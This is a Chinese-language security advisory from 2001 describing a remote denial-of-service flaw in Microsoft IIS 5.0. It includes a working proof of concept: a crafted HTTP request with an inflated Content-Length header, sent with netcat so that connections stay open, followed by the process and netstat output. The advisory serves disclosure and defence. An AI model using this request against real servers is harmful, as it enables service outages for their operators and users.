Microsoft IIS/5 在处理Content-length时候存在问题发布时间:2001-12-12 更新时间:2001-12-12 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 Microsoft IIS/5详细描述 当请求一不正确的请求给Microsoft IIS/5.0服务程序会返回错误并关闭连接。 如一般正常的请求如下: GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Authorization: Basic 不过我们如果在请求中增加"Content-Length: 5300643" 条目,如: $ cat " GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic" >bogus.txt $ nc 192.168.0.10 80 <bogus.txt & $ ps x PID PPID PGID WINPID TTY UID STIME COMMAND 696 1 696 696 con 500 12:22:37 /usr/bin/bash 2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc 2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps $ netstat -an |grep 192.168.0.10 TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED 会发现IIS不会关闭此连接,大量的类似连接可能导致IIS5.0产生拒绝服务攻击。 测试代码 见描述部分 解决方案 尚无 相关信息 Ivan Hernandez Puga (ivan.hernandez@globalsis.com.ar) 参考:http://archives.neohapsis.com/archives/bugtraq/2001-12/0098.html |
